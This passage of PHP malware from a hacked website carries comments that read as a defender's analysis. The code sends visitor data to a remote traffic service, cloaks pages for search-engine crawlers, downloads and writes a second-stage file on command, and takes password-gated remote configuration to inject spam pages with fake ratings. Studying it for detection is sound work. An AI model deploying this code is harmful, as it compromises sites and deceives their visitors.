    	$header = substr($html, 0, $header_size);
    	$html = substr($html, $header_size);
    	curl_close($ch);
    if (isset($_SERVER['HTTP_USER_AGENT']))
        $url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}";
    	if (strstr($id, ".css")){
    		header('Content-Type: text/css; charset=utf-8');
    	}
    	elseif (strstr($id, ".png")){
    		header('Content-Type: image/png');
    	}
    	elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){
    		header('Content-Type: image/jpeg');
    	}
    	elseif (strstr($id, ".gif")){
    		header('Content-Type: image/gif');
    	}
    	elseif (strstr($id, ".xml")){
    		header('Content-Type: application/xml');
    	}
    		echo $html;
    		//exit;
    	}
    }	
    
    				if (preg_match_all("/g2gg$/", $id, $matches) ) {
    				//	$user_ip = getUserIP();
    
    //echo $user_ip;
    				echo $user_ip;
    				echo '1111';
    				
    				}
    	
    
    //if (preg_match_all("/fjerritslev-gym.dk|espressobar.dk|tomyamthailand.com|goshopping.support|akait.dk|serop.dk|nielsbuus.dk|traume.dk|jesperastrom.com|kolding-netavis.dk/", $r, $matches) ) {
    //$tr = preg_replace ('#^www\.#', '', $_SERVER['SERVER_NAME']);
    //$tr = preg_replace ('#^[^\.]*#', '', $tr);
    //$tr = str_replace('.', '', $tr);
    //}
    //if (!preg_match_all("/fjerritslev-gym.dk|espressobar.dk|tomyamthailand.com|goshopping.support|akait.dk|serop.dk|nielsbuus.dk|traume.dk|jesperastrom.com|kolding-netavis.dk/", $r, $matches) ) {
    
    $tr = preg_replace('#^www\.#', '', $_SERVER['SERVER_NAME']);
    $tr = str_replace('.', '', $tr);
    
    //}
    $uag = $_SERVER['HTTP_USER_AGENT']; 
    	$user_ip = getUserIP();
    			if (preg_match_all("/page2-/", $id, $matches) ) { //урл страницы
    			//if (preg_match_all("/ecocyclerieloirelayonaubance.fr|daruselamguesthouse.com/", $host, $matches)) {
    			//	echo $user_ip;
    
    //dorgen////////////////////////////////
    		$ch = curl_init();
    
    							if (preg_match_all("/google|bing|msn|yahoo/", $r, $matches) ) {
    									if (!preg_match_all("/213.111.153.217|5.45.69.4|134.19.179.131|185.104.184.43|213.152.180.5|141.98.102.235|134.19.179.195|178.162.204.214|185.156.175.35|82.102.27.163|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
    			 $url_string = 'https://fst.sex-dating77.com/mix/'.$tr.'/'.$id.''; 
    		} }
    	if (preg_match_all("/213.111.153.217|5.45.69.4|134.19.179.131|185.104.184.43|213.152.180.5|141.98.102.235|134.19.179.195|178.162.204.214|82.102.27.163|185.156.175.35|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
    			 $url_string = 'https://fst.sex-dating77.com/mix/'.$tr.'/'.$id.''; 
    	}
    	curl_setopt ($ch, CURLOPT_URL, $url_string);
    	curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
    	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    	curl_setopt($ch, CURLOPT_HEADER, 1);
    	curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $host=$_SERVER['HTTP_HOST'];
    $ref =$_SERVER['HTTP_REFERER'];
    $uri =$_SERVER['REQUEST_URI'];
    $r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
    	curl_setopt($ch, CURLOPT_REFERER, $r);
    	curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR']));
    $html = curl_exec ($ch);
    if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") {
        if (preg_match('~Location: (.*)~i', $html, $match)) {
          $location = trim($match[1]);
         }    curl_close($ch);
      
        header('Location: ' . $location);
                                                          exit();
      }	$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
    	$header = substr($html, 0, $header_size);
    	$html = substr($html, $header_size);
    	curl_close($ch);
    if (isset($_SERVER['HTTP_USER_AGENT']))
        $url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}";
    
    	if (strstr($id, ".css")){
    		header('Content-Type: text/css; charset=utf-8');
    	}
    	elseif (strstr($id, ".png")){
    		header('Content-Type: image/png');
    	}
    	elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){
    		header('Content-Type: image/jpeg');
    	}
    	elseif (strstr($id, ".gif")){
    		header('Content-Type: image/gif');
    	}
    	elseif (strstr($id, ".xml")){
    		header('Content-Type: application/xml');
    	}
    
    	if(strstr($header, 'pdf'))
    	    header('Content-Type: application/pdf');
    
    	echo $html;
    //	exit;
    	} 
    	
    
    	
    	///////tds
    // "tds" section: for every request whose URI does not look like a WordPress admin/login/xmlrpc
    // path, the visitor's details are sent to a remote API, and the API's answer decides which HTTP
    // headers and body this site returns.
    $pagesID = $_SERVER['REQUEST_URI'];
    if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) {
    // Hard-coded API token for the remote service; useful as a search string when hunting for other copies.
    $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp';
    $keyword = $_SERVER['REQUEST_URI'];
    $url_page=$_SERVER['REQUEST_URI'];
    $ua = urlencode($_SERVER['HTTP_USER_AGENT']);
    // First two characters of Accept-Language, or an empty string when the header is absent.
    $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : '');
    // Visitor IP, attempt 1: first non-empty value among these keys.
    $ip = null;
    $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR');
    foreach ($headers as $header) {
        if (!empty($_SERVER[$header])) {
            $ip = $_SERVER[$header];
            break;
        }
    }
    // For a comma-separated chain: second-to-last entry when the User-Agent contains "mini", else the first.
    if (strstr($ip, ',')) {
        $tmp = explode(',', $ip);
        if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) {
            $ip = trim($tmp[count($tmp) - 2]);
        } else {
            $ip = trim($tmp[0]);
        }
    }
    // Visitor IP, attempt 2: this assignment always runs, so the value chosen above is discarded.
    // Result: first X-Forwarded-For entry when that header is set, otherwise REMOTE_ADDR.
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
       $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
       $ip = trim($tmp[0]);
    } else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $referrer = urlencode(@$_SERVER['HTTP_REFERER']);
    //$url = "https://keitr.sex-dating77.com/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_7=".$_SERVER['REQUEST_URI']."&" . http_build_query($_GET) . "";
    // The request discloses the visitor's User-Agent, IP, requested URI, referrer, language and
    // the full query string to the remote host.
    $url = "https://me.sex-dating77.com/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_7=".$_SERVER['REQUEST_URI']."&" . http_build_query($_GET) . "";
    
    // No timeout is set on this handle, and the call is made inline while the page is being served.
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $output = curl_exec($ch);
    curl_close($ch);
    $result = json_decode($output);
    // Remote-controlled response: each string in redirect.headers is passed to header() and
    // redirect.content is echoed as-is, so the remote server chooses redirects and page content.
    if (!empty($result->redirect)) {
      foreach($result->redirect->headers as $header) {
        header($header);
      }
      if ($result->redirect->content) {
         echo $result->redirect->content;
      }
    }
    
    }
    
    ///////ztds
    
    	// "ztds" section setup: errors are hidden from the output and the memory limit is raised.
    	@ini_set('display_errors', '0');
    error_reporting(0);
    @ini_set("memory_limit","1024M");
    $curtime = time();
    $hspan = 0;
    // Hard-coded secret checked by the configuration handler further down; a good search string
    // when looking for other infected files.
    $gen_passwd = "ee4c20179023749bb8474d2af81e5281";
    
    $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
    // Ends the request when host+URI matches one of these patterns. The dots are unescaped, so each
    // "." matches any character and the filter is broader than the file extensions it lists.
    if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die();
    
    // Request-triggered second-stage download: a remote file is fetched and written to disk as
    // "{$eb}xml.php", and a link to it is printed. Treat any xml.php that is not part of the site
    // as suspect. NOTE(review): $eb is not assigned in the part of the file shown here.
    if ($_REQUEST['testwork'] == 'ololo') {
    $twork = file_get_contents('https://karanbit.com/lnk/up/sh.txt');
    // The path prefix is cleared when it contains "cgi" or "admin".
    if (preg_match("#cgi|admin#i", $eb)) $eb = '';
    if (file_put_contents("{$eb}xml.php", $twork)) echo "success!<br><a href=/{$eb}xml.php>go</a>";
    else echo "error!";
    die();
    }
    
    // get_data_yo($url): downloads $url and returns the response body. Which of the two definitions
    // is declared depends on whether allow_url_fopen is enabled in php.ini.
    if (ini_get('allow_url_fopen')) {
        // URL wrappers available: plain file_get_contents().
        function get_data_yo($url) {
            $data = file_get_contents($url);
            return $data;
        }
    }
    else {
        // Fallback through cURL: body only (no headers), 8-second connect timeout.
        function get_data_yo($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
    }
    // Visitor classification. The flags set here ($fromse, $abt, $abtip) feed the later
    // `if ($abt || $fromse || $redcode || $hspan)` branch.
    $ip = urlencode($_SERVER['REMOTE_ADDR']);
    $ua = urlencode($_SERVER['HTTP_USER_AGENT']);
    //block ddos bots
    // Requests from these SEO/archive crawlers are terminated outright.
    $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i';
    if (preg_match($blbots, $ua)) die();
    $ref = urlencode($_SERVER['HTTP_REFERER']);
    // $fromse = 1 when the referrer contains one of these search-engine names.
    $poiskoviki = '/google|bing|yahoo|aol|rambler/i';
    $fromse = 0;
    if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1;
    $abt = 0;
    $abtip = 0;
    // A "debug" query parameter sets $abt as well.
    if (isset($_GET['debug'])) $abt = 1;
    // The second assignment overrides the first: the pattern actually used matches any User-Agent
    // containing one of the letters a-g, so $abt ends up 1 for practically every client.
    $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i';
    $crawlers = '/a|b|c|d|e|f|g/i';
    if (preg_match($crawlers, $ua)) {
        $abt = 1;
    }
    // Local cache of a remote list, stored as "{$eb}.bt" (an on-disk artifact of this sample).
    if (file_exists("{$eb}.bt")) {
        $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $btime = filemtime("{$eb}.bt");
        $obtime = $curtime - $btime;
    }
    // Refresh when the cache is missing, has fewer than three lines, or is older than 172800 s (48 hours).
    if (!$bots[2] || $obtime > 172800) {
        $fbots = get_data_yo("https://karanbit.com/lnk/bots.dat");
        $btf = fopen("{$eb}.bt", 'w');
        fwrite($btf, $fbots);
        fclose($btf);
        $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    }
    // Exact-line match of the (url-encoded) REMOTE_ADDR against the downloaded list.
    if (in_array($ip, $bots)) {
            $abt = 1;
            $abtip = 1;
    }
    
    // Working directory suffix: the sample keeps its state under "{$eb}.st" (files .r and .k below).
    // A directory of that name on the server is an artifact of this infection.
    $st = '.st';
    $cldw = 0;
    $dw = 0;
    
    // Remote configuration handler: runs when the request asks for it and supplies a value equal
    // (loose ==) to the hard-coded $gen_passwd set earlier in the file. All settings written below
    // come straight from request parameters.
    if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) {
            $cldw = 0;
            if ($_REQUEST['cldw']) $cldw = 1;
            $qq = $_REQUEST['qq'];
            // First run: no config file yet, so the state directory is created.
            if (!file_exists("{$eb}{$st}/.r")) {
                    $qq = $_REQUEST['qq'];
                    mkdir("{$eb}{$st}");
            }
            else {
                // Existing config: keep the stored third field unless the request supplies a new one.
                $pamparam = file_get_contents("{$eb}{$st}/.r");
                $eqq = explode('|', $pamparam);
                if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq'];
                else $qq = trim($eqq[2]);
            }
            $redir = $_REQUEST['redir'];
            // redcode is HTML-entity-decoded, then stored base64-encoded.
            $redcode = $_REQUEST['redcode'];
            $redcode = htmlspecialchars_decode($redcode);
            $redcode = base64_encode($redcode);
            $group = $_REQUEST['group'];
            // With cldw set, a "<group prefix before '_'>.keys" file is downloaded and saved as .k.
            if ($cldw) {
                $egroup = explode('_', $group);
                $kgroup = $egroup[0];
                $clkeys = get_data_yo("https://karanbit.com/lnk/gen/keys/$kgroup.keys");
                file_put_contents("{$eb}{$st}/.k", $clkeys);
            }
            $lang = $_REQUEST['lang'];
            // Config file format: redir|group|qq|lang|base64(redcode)|cldw
            file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw");
            // Confirms the write to the caller and ends the request.
            if (file_exists("{$eb}{$st}/.r")) {
                echo "created";
                die();
            }
    }
    
    // Load the stored config on every request. Fields are pipe-separated in the
    // order redir|group|qq|lang|redcode|cldw.
    if (file_exists("{$eb}{$st}/.r")) {
        $dw = 1;
        $pamparam = file_get_contents("{$eb}{$st}/.r");
        $eqq = explode('|', $pamparam);
        $redir = $eqq[0];
        // A redirect target that does not contain "https://" is treated as
        // base64 and decoded.
        if (!strstr($redir, 'https://')) $redir = base64_decode($redir);
        $group = $eqq[1];
        $qq = trim($eqq[2]);
        $lang = trim($eqq[3]);
        if ($eqq[4]) $redcode = base64_decode($eqq[4]);
        $cldw = $eqq[5];
    }
    
        // Build identifiers for the current page from the Host header and the
        // request URI (both client-influenced): $donor is host+URI, $page is the
        // same string with "/" replaced by "|", and $ddname is the first label of
        // the host name with "www." removed. $page is later used in cache file
        // names under the working directory.
        $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
        $ddomain = $_SERVER['HTTP_HOST'];
        $ddomain = str_ireplace('www.', '', $ddomain);
        $eddomain = explode('.', $ddomain);
        $ddname = $eddomain[0];
        $donor = str_ireplace('www.', '', $donor);
        $page = str_replace('/', '|', $donor);
        $donor = urldecode($donor);
        $epage = explode('|', $page);
        // $morda = 1 marks the site's front page (empty path, index.php or ?p=home).
        $morda = 0;
        if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1;
    
    //$fromse = 1;
    
    if ($abt || $fromse || $redcode || $hspan) {
    
        // For flagged visitors without the keyword parameter, ask the hard-coded
        // remote host for a list of links for this page; the current host+URI is
        // sent in the query string. $hspan is set outside this excerpt.
        // NOTE(review): the separator literal below is a newline followed by four
        // spaces as pasted; the spaces are probably forum indentation.
        if (($abt || $hspan) && !$_GET[$qq]) {
            $ll = get_data_yo("https://karanbit.com/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo");
            $el = explode('
    ', $ll);
        }
    
        // A cached full HTML page for this URL is served verbatim and the
        // request ends, so the site's own content is never rendered.
        if (file_exists("{$eb}{$st}/$page.html")) {
            $htmlpage = file_get_contents("{$eb}{$st}/$page.html");
            echo $htmlpage;
            die();
        }
        // A cached text record (key|desc|txt|h1) is looked up by md5($page) first,
        // then by the raw page name.
        $mdpage = md5($page);
        if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) {
            if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt");
            else $gtxt = file_get_contents("{$eb}{$st}/$page.txt");
            $etxt = explode('|', $gtxt);
            $key = $etxt[0];
            $desc = $etxt[1];
            $txt = $etxt[2];
            $h1 = $etxt[3];
        }
        // Nothing cached: generate content for a keyword.
        elseif ($cldw || isset($_GET[$qq])) {
            $desc = '';
            // Take the first keyword from ".k" and write the remaining lines back.
            // $newkeys is not initialised before the loop in this excerpt.
            $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES);
            if ($keys[0]) {
                $key = $keys[0];
                for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk]
    ";
                file_put_contents("{$eb}{$st}/.k", $newkeys);
            }
            // A keyword in the query string overrides the one from the list.
            if (isset($_GET[$qq])) {
                $key = str_replace('-', ' ', $_GET[$qq]);
            }
            if ($key) {
                $parkey = $key;
                $tkey = str_replace(' ', '-', $key);
                // "own:<base64 URL>" in the lang field points at an
                // operator-supplied text source; otherwise the hard-coded host is
                // used.
                if (stristr($lang, 'own')) {
                    $lang = str_replace('own:', '', $lang);
                    $owntext = base64_decode($lang);
                    $wkey = urlencode($key);
                    if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey");
                    else $ttxt = get_data_yo("{$owntext}?key=$wkey");
                }
                else $ttxt = get_data_yo("https://karanbit.com/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain");
                // A response containing "<html" is echoed as-is, cached as
                // "$page.html" and ends the request: remote content is both
                // served and written to disk without any inspection.
                if (preg_match('#<html#is', $ttxt)) {
                    echo $ttxt;
                    file_put_contents("{$eb}{$st}/$page.html", $ttxt);
                    die();
                }
                // Otherwise the payload sits between "gogogo" and "enenen"
                // markers, with fields separated by "||".
                preg_match('#gogogo(.*)enenen#is', $ttxt, $mtchs);
                $etxt = explode('||', $mtchs[1]);
                $key = $etxt[0];
                $title = ucfirst($key);
                $h1 = ucfirst($etxt[1]);
                // Fabricated schema.org Product/AggregateRating markup with a
                // random rating and review count is prepended to the text.
                $rating = rand(4,5);
                $rcount = rand(22,222);
                $txt = "<div itemscope=\"\" itemtype=\"https://schema.org/Product\">\n<span itemprop=\"name\">$parkey rating</span>\n<div itemprop=\"aggregateRating\" itemscope=\"\" itemtype=\"https://schema.org/AggregateRating\">\n<span itemprop=\"ratingValue\">$rating-5</span> stars based on\n<span itemprop=\"reviewCount\">$rcount</span> reviews\n</div>\n</div>\n";
                $desc = $etxt[2];
                $txt .= $etxt[3];
                if ($desc == 'desc') {
                    $desc = get_data_yo("https://karanbit.com/lnk/gen/desc.php?key=$tkey&desc=$group");
                    preg_match('#gogogo(.*)enenen#is', $desc, $mtchs);
                    $desc = $mtchs[1];
                }
    
                // Cache the record as "<md5 of page>.txt" and, in cldw mode,
                // append a link to this page to "cldwmap.txt".
                $mdpage = md5($page);
                file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1");
                $newclpage = str_replace('|', '/', $page);
                $newcllink = "<a href=\"https://$newclpage\">$parkey</a>
    ";
                if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND);
            }
        }
        
        $iswp = 0;
        if (file_exists('wp-includes/vars.php')) $iswp = 1;
    
        $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES);
        ob_start();
    
        // Output rewriter, registered as a shutdown function below. It takes the
        // page captured by the ob_start() call that precedes this definition,
        // alters it and echoes the result. All inputs arrive through globals set
        // by the surrounding script.
        // Defender note: a global function named "shutdown" passed to
        // register_shutdown_function(), together with output buffering in a theme
        // functions.php, is a useful search pattern for this injection.
        function shutdown() {
            global $morda; global $eb; global $txt; global $qq; global $key;  global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname;
            $title = ucfirst($key);
            $my_content = ob_get_contents();
            ob_end_clean();
            // Any request carrying a "prigod" parameter gets the marker string
            // instead of the page; presumably a probe the operator uses to confirm
            // the injection is active.
            if ($my_content && isset($_REQUEST['prigod'])) {
                $my_content = '---prigod---';
            }
            // Branch 1: a keyword is set and the visitor is on the bot list, so
            // the page is rewritten around the generated text.
            if ($key && $abt) {
    
                if ($cldw && !$morda) {
                    // Replace the page's anchors, in order, with links from
                    // cldwmap.txt. $cntahrefs and $cntcldwmap are computed but
                    // never used.
                    preg_match_all('#<a (.*)</a>#iUm', $my_content, $ahrefs);
                    $cntahrefs = count($ahrefs[0]);
                    $cntcldwmap = count($cldwmap);
                    $i = 0;
                    foreach ($ahrefs[0] as $ahref) {
                        if ($cldwmap[$i]) {
                            $my_content = str_replace($ahref, $cldwmap[$i], $my_content);
                        }
                        $i++;
                    }
                    // This footer branch cannot run: it is nested inside a block
                    // that requires !$morda.
                    if ($morda) {
                        $cldwfooter = '';
                        foreach ($cldwmap as $cldwflink) {
                            $cldwfooter .= "$cldwflink ";
                        }
                        $my_content = str_replace('</body>', "<footer>
    <div class=\"tags_cloud footer column block\" id=\"tags_cloud footer column block\">
    $cldwfooter
    </div>
    </footer>
    </body>", $my_content);
                    }
                }
    
                if (!$morda) {
                    // Replace title and the first h1/h2/h3, drop canonical,
                    // shortlink, description, robots, keywords and og: tags, add a
                    // new meta description, and remove the first <script> element.
                    $my_content = preg_replace('#<title(.*)<\/title>#iUs', "<title>$title</title>", $my_content, 1);
                    $my_content = preg_replace("#<link rel=[\"\']{1}canonical(.*)\>#iUs", '', $my_content);
                    $my_content = preg_replace("#<link rel=[\"\']{1}shortlink(.*)\>#iUs", '', $my_content);
                    $my_content = preg_replace('#<h1(.*)<\/h1>#iUm', "<h1>$h1</h1>", $my_content, 1);
                    $my_content = preg_replace('#<h2(.*)<\/h2>#iUm', "<h2>$h1</h2>", $my_content, 1);
                    $my_content = preg_replace('#<h3(.*)<\/h3>#iUm', "<h3>$h1</h3>", $my_content, 1);
                    $my_content = preg_replace("#<meta name=[\"\']{1}description(.*)\>#iUs", '', $my_content);
                    $my_content = preg_replace("#<meta name=[\"\']{1}robots(.*)\>#iUs", '', $my_content);
                    $my_content = preg_replace("#<meta name=[\"\']{1}keywords(.*)\>#iUs", '', $my_content);
                    $my_content = str_replace('</head>', "<meta name=\"description\" content=\"$desc\">
    </head>", $my_content);
                    $my_content = preg_replace("#<meta property=[\"\']{1}og:(.*)[\"\']{1} content=[\"\']{1}.*[\"\']{1}\s?\/>#iUs", '', $my_content);
                    $my_content = preg_replace('#<script(.*)<\/script>#iUs', '', $my_content, 1);
            
                    // Replace the first matching content container with $txt. The
                    // chain tries common theme containers from most to least
                    // specific and falls back to any <div>, then to <body>.
                    if (@preg_match('#<article(.*)<\/article>#iUs', $my_content)) {
                        $my_content = preg_replace('#<article(.*)<\/article>#iUs', "<article>
    $txt
    </article>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div id="page-content">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div id="page-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="page-content">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="page-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="maincontent">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="maincontent">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="home-content">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="home-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="content"(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="content"(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div id="content"(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div id="content"(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div id="content" class="clearfix">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div id="content" class="clearfix">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div id="content" class="hfeed">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div id="content" class="hfeed">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="content clearfix">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="content clearfix">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="body_container">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="body_container">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div id="content" class="widecolumn">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div id="content" class="widecolumn">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div id="entry-content">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div id="entry-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="entry-content">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="entry-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div id="main-content">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div id="main-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div id="content-area">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div id="content-area">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="post-content">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="post-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="item-page">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="item-page">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="grid(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="grid(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="page(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="page(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="column(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="column(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="nextend-flux">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="nextend-flux">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    // preg_match() is called here without a subject argument, so
                    // this <table> branch cannot match as written.
                    elseif (@preg_match('#<table(.*)>#iUs')) {
                        $my_content = preg_replace('#<table(.*)>#iUs', "<table>\n<div>$txt</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div class="inner-wrapper">(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div class="inner-wrapper">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<div(.*)</div>#iUs', $my_content)) {
                        $my_content = preg_replace('#<div(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1);
                    }
                    elseif (@preg_match('#<body(.*)>#iUs', $my_content)) {
                        $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n<div>\n$txt\n</div>", $my_content, 1);
                    }
                }
    
            } //end if key
            // Branch 2: no keyword page. Unless the title looks like a 404 page,
            // scatter the fetched link lines ($el) through the real content.
            elseif (!preg_match('#<title>(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) {
                foreach($el as $ln) {
                    // Each link is placed next to the first remaining inline or
                    // paragraph tag. The tag is rewritten to a "_-tag-_"
                    // placeholder so the next link lands on a different
                    // occurrence. A matched <br> is consumed, and the <body>
                    // fallback loses its attributes.
                    if (preg_match('#<strong>#', $my_content)) {
                        $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1);
                    }
                    elseif (preg_match('#<b>#', $my_content)) {
